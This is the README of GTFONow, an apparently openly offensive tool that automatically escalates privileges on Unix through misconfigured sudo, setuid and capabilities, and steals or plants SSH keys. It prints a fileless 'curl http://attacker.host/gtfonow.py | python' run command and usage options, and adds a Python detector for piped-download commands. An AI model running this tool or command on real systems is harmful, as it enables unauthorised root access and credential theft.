Automatic privilege escalation for misconfigured capabilities, sudo config and setuid/setgid binaries.
Feature | Implemented |
---|---|
Automatically exploit misconfigured sudo permissions. | ✔️ |
Automatically exploit misconfigured suid, sgid permissions. | ✔️ |
Automatically exploit misconfigured capabilities. | ✔️ |
Automatically convert arbitrary file read primitive into shell by stealing SSH keys. | ✔️ |
Automatically convert arbitrary file write primitive into shell by dropping SSH keys. | ✔️ |
Automatically convert arbitrary file write primitive into shell by writing to cron. | ✔️ |
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD. | ✔️ |
Single file, easy to run fileless with `curl http://attackerhost/gtfonow.py \| python` | ✔️ |
Interactionless mode. For environments where stdin is not controllable. | Todo |
By design, GTFONow is a backwards-compatible, stdlib-only Python script, meaning it should work on any variant of Unix if Python is installed.
Platform | Supports |
---|---|
Python2.* | ✔️ |
Python3.* | ✔️ |
No 3rd party dependencies | ✔️ |
Any Unix Variant (Linux, MacOS, *Nix) | ✔️ |
Any architecture, e.g. X86/ARM64/X86-64 | ✔️ |
Systems without Python installed | Todo |
To use GTFONow, simply run the script from your command line. The basic syntax is as follows:

```
python gtfo_now.py [OPTIONS]
```

It can also be run by piping the output of curl:

```
curl http://attacker.host/gtfonow.py | python
```
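For detection, the piped curl invocation above has a recognizable shape in shell or EDR command-line logs: a downloader whose output reaches an interpreter that was given no script to run. The following is an added example, not part of GTFONow; the function names and the sample log lines are constructed, and it assumes Python 3.8 or later on the analysis host.

```python
import os
import shlex

DOWNLOADERS = {"curl", "wget", "fetch"}
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby"}

def pipelines(cmdline):
    """Split a command line into pipelines; each is a list of argv stages."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""   # whole URLs; '#' is literal
    out, stages, argv = [], [], []
    for tok in lex:
        if not tok or set(tok) - set("();<>|&"):
            argv.append(tok)          # ordinary word, not a shell operator
        elif tok[0] in "<>":
            next(lex, None)           # redirection: drop its target as well
        else:
            stages, argv = stages + [argv], []
            if tok not in ("|", "|&"):    # ; && || & ( ) end the pipeline
                out, stages = out + [stages], []
    return out + [stages + [argv]]

def program(argv):
    """Return (basename, args) after skipping simple wrapper prefixes."""
    while argv and os.path.basename(argv[0]) in ("sudo", "env", "nohup"):
        argv = argv[1:]
    return (os.path.basename(argv[0]), argv[1:]) if argv else ("", [])

def download_piped_to_interpreter(cmdline):
    """Flag downloader -> interpreter with no script, -m module or -c/-e code."""
    try:
        parsed = pipelines(cmdline)
    except ValueError:                # unbalanced quotes in the logged line
        return False
    for stages in parsed:
        seen = False
        for prog, args in map(program, stages):
            if prog in DOWNLOADERS:
                seen = True
            elif seen and prog in INTERPRETERS and all(
                    a.startswith("-") and a[:2] not in ("-c", "-m", "-e") for a in args):
                return True
    return False

# Constructed sample lines, as a shell or EDR command log might record them.
SAMPLES = ["curl http://attacker.host/gtfonow.py | python",
           "curl -s http://attacker.host/gtfonow.py 2>/dev/null | sudo python3 -",
           "curl -s https://api.example.test/status | python -m json.tool"]
HITS = [c for c in SAMPLES if download_piped_to_interpreter(c)]  # the first two
```

The check only sees pipelines that appear in a single logged command string; pairing it with process telemetry (an interpreter whose stdin is a pipe from a network client) covers cases where the shell line is not recorded.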
Here are the options you can use with GTFONow:

- `--level`: Sets the level of checks to perform. You can choose between:
  - `1` (default) for a quick scan.
  - `2` for a more thorough scan.
  - Example: `python gtfonow.py --level 2`
- `--risk`: Specifies the risk level of the exploit to perform. The options are:
  - `1` (default) for safe operations.
  - `2` for more aggressive operations, primarily for use in CTFs. If using on real engagements, ensure you understand what this is doing.
  - Example: `python gtfonow.py --risk 2`
- `--sudo_password`: Enables sudo_password mode, offering more privilege escalation options if you know the sudo password.
  - This option does not require a value. You will be prompted to enter the sudo password via stdin.
  - Example: `python gtfonow.py --sudo_password`
- `--command`: Issues a single command instead of spawning an interactive shell. This is mainly for debugging purposes.
  - Example: `python gtfonow.py --command 'ls -la'`
- `-v`, `--verbose`: Enables verbose output.
  - Example: `python gtfonow.py --verbose`

Here are some example commands to get you started:

- Perform a quick scan: `python gtfonow.py`
- Perform a thorough scan with a higher risk level: `python gtfonow.py --level 2 --risk 2`

- Payloads thanks to GTFOBins.